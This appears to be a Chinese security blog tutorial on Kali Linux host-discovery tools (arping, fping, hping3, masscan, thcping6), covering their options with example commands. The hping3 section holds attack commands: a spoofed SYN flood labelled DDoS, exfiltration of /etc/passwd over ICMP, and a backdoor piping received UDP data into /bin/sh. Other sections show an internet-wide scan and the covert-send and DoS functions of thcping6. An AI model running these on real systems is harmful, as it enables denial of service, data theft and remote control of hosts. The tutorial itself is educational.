网络安全工具篇1--信息收集篇1

我是K,我致力于网络安全

在上一篇博客中,2.2的内容是工具使用(没看过的小伙伴可以看一下我的上一篇博客)。那从今天开始,我们就开始介绍Kali Linux中的各类工具。看标题也知道,我们今天要介绍的就是Kali Linux中的信息收集工具。话不多说,现在就让我们进入今天的主题吧。我们今天要讲的是存活主机识别工具

存活主机识别工具

1.arping工具

1.1版本

arping是用于发送arp请求到相邻主机的工具,arping使用arp数据包。arping有两个版本,一个版本是Thomas Habets这个人写的,这个版本有个好处是可以arping <MAC>地址,也就是我们可以通过MAC地址得到IP地址。还有一个版本是Linux iputils suite的,但这个版本就不能通过MAc解析出IP地址了。

我们可以用arping -v来查看自己系统的arping版本。根据观察,Redhat/CenOS使用的是Linux iputils sutie版本的,debian使用的是Thomas Habets写的。

注意:两个版本的arping使用参数有很大的区别,所以要根据自己的arping版本去使用相应的参数。不同版本在网上抄的命令可能在自己的系统上无法执行。下面介绍Linux iputils sutie版本的arping命令用法。

1.2语法

Usage: arping [-fqbDUAV] [-c count] [-w timeout] [-I device] [-s source] destination

1.3参数释义

-A:与-U参数类似,但是使用的是ARP REPLY包而非ARP REQUEST包。
-b:发送以太网广播帧,arping在开始时使用广播地址,在收到回复后使用unicast单播地址。
-c:发送指定的count个ARP REQUEST包后停止。如果指定了-w参数,则会等待相同数量的ARP REPLY包,直到超时为止。
-D:重复地址探测模式,即,Duplicate address detection mode (DAD),用来检测有没有IP地址冲突,如果没有IP冲突则返回0。
-f:收到第一个响应包后退出。
-h:显示帮助页。
-I:用来发送ARP REQUEST包的网络设备的名称。
-q:quite模式,不显示输出。
-U:无理由的(强制的)ARP模式去更新别的主机上的ARP CACHE列表中的本机的信息,不需要响应。
-V:显示arping的版本号。
-w:指定一个超时时间,单位为秒,arping在到达指定时间后退出,无论期间发送或接收了多少包。
在这种情况下,arping在发送完指定的count(-c)个包后并不会停止,
而是等待到超时或发送的count个包都进行了回应后才会退出。
-s:设置发送ARP包的IP资源地址,如果为空,则按如下方式处理:
  1、DAD模式(-D)设置为0.0.0.0;
  2、Unsolicited模式(-U)设置为目标地址;
  3、其它方式,从路由表计算。

1.4实例

arping -l eth0 192.168.1.7   //指定网卡,向目标ip发起请求
ARPING 192.168.1.7 from 192.168.1.124
Unicast reply from 192.168.1.8 [98:01:A7:9F:5E:9D]  0.817ms  //此时可以看到目标ip的MAC地址
Unicast reply from 192.168.1.8 [98:01:A7:9F:5E:9D]  0.749ms​​

​​Unicast reply from 192.168.1.8 [98:01:A7:9F:5E:9D]  0.741ms​​

​​Unicast reply from 192.168.1.8 [98:01:A7:9F:5E:9D]  0.787ms​

2. fping工具

2.1 简介

fping检测主机是否存在,fping命令 fping类似于ping,但比ping强大。与ping要等待某一主机连接超时或发回反馈信息不同,fping给一个主机发送完数据包后,马上给下一个主机发送数据包,实现多主机同时ping,fping还可以在命令行中指定要ping的主机数量范围。

2.2 参数释义

-a 显示存活的主机
-b ping 数据包的大小。(默认为56)
-c ping每个目标的次数 (默认为1)
-f 从文件获取目标列表(不能与 -g 同时使用)
-l 循环发送ping
-g 通过指定开始和结束地址来生成目标列表,可以使网段
-u 显示不可到达的目标

2.3 实例

(1)ping指定ip

fping 192.168.0.1 192.168.0.125 192.168.0.126 2>/dev/null
192.168.0.1 is alive
192.168.0.125 is alive
192.168.0.126 is unreachable

(2)ping整个网段

fping -g 192.168.0.0/24 2>/dev/null
192.168.0.1 is alive
192.168.0.103 is alive
...
192.168.0.253 is unreachable
192.168.0.254 is unreachable

(3)ping整个网段,只显示存活的主机

fping -ag 192.168.0.0/24 2>/dev/null
192.168.0.1
192.168.0.103

(4)ping某一段ip

fping -ag 192.168.0.5 192.168.0.130 2>/dev/null
192.168.0.103
...
192.168.0.125
192.168.0.130

3. hping工具

3.1 简介

Linux常用命令hping3命令是用于生成和解析TCPIP协议数据包的开源工具,也是安全审计、防火墙测试等工作的标配工具

3.2 参数释义

-H --help 显示帮助。
-v -VERSION 版本信息。
-c --count count 发送数据包的次数 关于countreached_timeout 可以在hping2.h里编辑。
-i --interval 包发送间隔时间(单位是毫秒)缺省时间是1秒,此功能在增加传输率上很重要,在idle/spoofing扫描时此功能也会被用到,你可以参考hping-howto获得更多信息-fast 每秒发10个数据包。
-n -nmeric 数字输出,象征性输出主机地址。
-q -quiet 退出。
-I --interface interface name 无非就是eth0之类的参数。
-v --verbose 显示很多信息,TCP回应一般如:len=46 ip=192.168.1.1 flags=RADF seq=0 ttl=255 id=0 win=0 rtt=0.4ms tos=0 iplen=40 seq=0 ack=1380893504 sum=2010 urp=0
-D --debug 进入debug模式当你遇到麻烦时,比如用HPING遇到一些不合你习惯的时候,你可以用此模式修改HPING,(INTERFACE DETECTION,DATA LINK LAYER ACCESS,INTERFACE SETTINGS,.......)
-z --bind 快捷键的使用。
-Z --unbind 消除快捷键。
-O --rawip RAWIP模式,在此模式下HPING会发送带数据的IP头。
-1 --icmp ICMP模式,此模式下HPING会发送IGMP应答报,你可以用--ICMPTYPE --ICMPCODE选项发送其他类型/模式的ICMP报文。
-2 --udp UDP 模式,缺省下,HPING会发送UDP报文到主机的0端口,你可以用--baseport --destport --keep选项指定其模式。
-9 --listen signatuer hping的listen模式,用此模式,HPING会接收指定的数据。
-a --spoof hostname 伪造IP攻击,防火墙就不会记录你的真实IP了,当然回应的包你也接收不到了。
-t --ttl time to live 可以指定发出包的TTL值。
-H --ipproto 在RAW IP模式里选择IP协议。
-w --WINID UNIX ,WINDIWS的id回应不同的,这选项可以让你的ID回应和WINDOWS一样。
-r --rel 更改ID的,可以让ID曾递减输出,详见HPING-HOWTO。
-F --FRAG 更改包的FRAG,这可以测试对方对于包碎片的处理能力,缺省的“virtual mtu”是16字节。
-x --morefrag 此功能可以发送碎片使主机忙于恢复碎片而造成主机的拒绝服务。
-y -dontfrag 发送不可恢复的IP碎片,这可以让你了解更多的MTU PATH DISCOVERY。
-G --fragoff fragment offset value set the fragment offset
-m --mtu mtu value 用此项后ID数值变得很大,50000没指定此项时3000-20000左右。
-G --rroute 记录路由,可以看到详悉的数据等等,最多可以经过9个路由,即使主机屏蔽了ICMP报文。
-C --ICMPTYPE type 指定ICMP类型,缺省是ICMP echo REQUEST。
-K --ICMPCODE CODE 指定ICMP代号,缺省0。
--icmp-ipver 把IP版本也插入IP头。
--icmp-iphlen 设置IP头的长度,缺省为5(32字节)。
--icmp-iplen 设置IP包长度。
--icmp-ipid 设置ICMP报文IP头的ID,缺省是RANDOM。
--icmp-ipproto 设置协议的,缺省是TCP。
-icmp-cksum 设置校验和。
-icmp-ts alias for --icmptype 13 (to send ICMP timestamp requests)
--icmp-addr Alias for --icmptype 17 (to send ICMP address mask requests)
-s --baseport source port hping 用源端口猜测回应的包,它从一个基本端口计数,每收一个包,端口也加1,这规则你可以自己定义。
-p --deskport [+][+]desk port 设置目标端口,缺省为0,一个加号设置为:每发送一个请求包到达后,端口加1,两个加号为:每发一个包,端口数加1。
--keep 上面说过了。
-w --win 发的大小和windows一样大,64BYTE。
-O --tcpoff Set fake tcp data offset. Normal data offset is tcphdrlen / 4.
-m --tcpseq 设置TCP序列数。
-l --tcpck 设置TCP ack。
-Q --seqnum 搜集序列号的,这对于你分析TCP序列号有很大作用。

3.3 实例

(1)防火墙测试

hping3 -S  -c 1000000 -a 10.10.10.10 -p 21 10.10.10.10

(2)端口扫描

hping3 -I eth0  -S 192.168.10.1 -p 80

(3)DDOS攻击

hping3 -I eth0 -a192.168.10.99 -S 192.168.10.33 -p 80 -i u1000

(4)文件传输

在接收端开启服务:

hping3 192.168.1.159--listen signature --safe  --icmp

在发送端发送文件:

hping3 192.168.1.108--icmp ?d 100 --sign signature --file /etc/passwd

(5)木马功能

在木马启动端(即植入目标):

hping3 192.168.10.66--listen signature --safe --udp -p 53 | /bin/sh

在远程控制端:

hping3 192.168.10.44 -p53 -d 100 --udp --sign siganature --file ./test.cmd

4. masscan工具

4.1 简介

masscan的作者号称masscan是最快的扫描工具,可以在6分钟内扫描完整个互联网。

4.2 参数

我们可以通过 masscan -h命令进行查看masscan的使用方法。这里就由我给大家列出来,如果不够详细和精准,大家也可以去自己查看(注:masscan是和nmap兼容的工具,里面的nmap的命令我就不现在讲了,在以后介绍nmap的时候,我再为大家详细讲解,感兴趣的小伙伴可以使用masscan-nmap命令进行查看)

IP地址范围,有三种有效格式,1、单独的IPv4地址 2、类似"10.0.0.1-10.0.0.233"的范围地址 3、CIDR地址 类似于"0.0.0.0/0",多个目标可以用都好隔开
-p <ports,--ports <ports>> 指定端口进行扫描
--banners 获取banner信息,支持少量的协议
--rate <packets-per-second> 指定发包的速率
-c <filename>, --conf <filename> 读取配置文件进行扫描
--echo 将当前的配置重定向到一个配置文件中
-e <ifname> , --adapter <ifname> 指定用来发包的网卡接口名称
--adapter-ip <ip-address> 指定发包的IP地址
--adapter-port <port> 指定发包的源端口
--adapter-mac <mac-address> 指定发包的源MAC地址
--router-mac <mac address> 指定网关的MAC地址
--exclude <ip/range> IP地址范围黑名单,防止masscan扫描
--excludefile <filename> 指定IP地址范围黑名单文件
--includefile,-iL <filename> 读取一个范围列表进行扫描
--ping 扫描应该包含ICMP回应请求
--append-output 以附加的形式输出到文件
--iflist 列出可用的网络接口,然后退出
--retries 发送重试的次数,以1秒为间隔
--nmap 打印与nmap兼容的相关信息
--http-user-agent <user-agent> 设置user-agent字段的值
--show [open,close] 告诉要显示的端口状态,默认是显示开放端口
--noshow [open,close] 禁用端口状态显示
--pcap <filename> 将接收到的数据包以libpcap格式存储
--regress 运行回归测试,测试扫描器是否正常运行
--ttl <num> 指定传出数据包的TTL值,默认为255
--wait <seconds> 指定发送完包之后的等待时间,默认为10秒
--offline 没有实际的发包,主要用来测试开销
-sL 不执行扫描,主要是生成一个随机地址列表
--readscan <binary-files> 读取从-oB生成的二进制文件,可以转化为XML或者JSON格式.
--connection-timeout <secs> 抓取banners时指定保持TCP连接的最大秒数,默认是30秒。

4.3 实例

(1)扫描制定网段范围内的指定端口

masscan -p80,8080-8100 10.0.0.0/8

(2)获取Banner

masscan 10.0.0.0/8 -p80 --banners --source-ip x.x.x.x

(3)进行全网扫描,此处可对整个互联网进行扫描

masscan 0.0.0.0/0 -p0-65535

4.4 结果输出

默认情况下,masscan会生成相当大的文本文件,但是很容易将它们转换为任何其他格式。支持五种输出格式:

xml:只需使用参数-oX。或者,使用参数--output-format xml和--output-filename <filename>。
二进制:这是masscan内置格式。它产生的文件要小得多,因此,当我扫描Internet时,磁盘不会填满。但是,它们需要解析。命令行选项--readscan将读取二进制扫描文件。--readscan与该-oX选项一起使用将生成结果文件的XML版本。
grepable:这是Nmap -oG输出的实现,可以通过命令行工具轻松地对其进行解析。只需使用参数-oG。或者,使用参数--output-format grepable和 --output-filename <filename>。
json:这会将结果保存为JSON格式。只需使用参数-oJ。或者,使用参数--output-format json和 --output-filename <filename>。
list:这是一个简单的列表,每行一个主机和端口对。只需使用参数-oL。或者,使用参数 --output-format list和--output-filename <filename>

转换格式为:

<port state> <protocol> <port number> <IP address> <POSIX timestamp>  
open tcp 80 XXX.XXX.XXX.XXX 1390380064

5.thcping6 工具

5.1 简介

thcping6是黑客所使用来进行IPV6攻击的攻击之一。(注意:在kali的终端中,输入thcping6是搜索不到此工具的,应该输入:atk6-thcping6)

5.2 参数

address6 <mac-address/ipv4-address/ipv6-address> [ipv6-prefix]
	将mac地址或ipv4地址转换为ipv6地址(如果未将前缀作为第二选项提供链接,则为本地链接),或者在给定ipv6地址的情况下,打印mac地址或ipv4地址。 打印所有可能的变体。 对于错误或找到的变体数返回-1。

alive6 <interface> [unicast-or-multicast-address [remote-router]]
	在细分中显示有效地址。 如果指定了远程路由器,则将发送带有分片前缀的路由头的数据包。

covert_send6 <interface> <target> <file> [port]
	秘密地将文件的内容发送到目标。

covert_send6d <interface> <file>
	将收到的秘密内容写入文件。

denial6 <interface> <destination> <test-case-number>
	对目标执行DDOS攻击

detect_sniffer6 <interface> [target-ip]
	测试本地LAN上的系统是否正在嗅探。 适用于Windows,Linux系统

由于我对此工具还不熟悉,较少使用,所以此工具暂时没有实例。如果有熟悉此工具的小伙伴,可以私信提供一下实例,方面日后添加

以上是kali Linux中的存活识别工具,以后我还会教大家其他工具的使用

注意:以上内容只用于网络安全学习当中,如阅读此文章后,将工具使用于非法途径,与本人无关,一切后果均由违法人员承担。在使用工具时,请遵守《中华人民共和国网络安全法》等法规及所在地的有关法律法规

King

  • 2
    点赞
  • 14
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值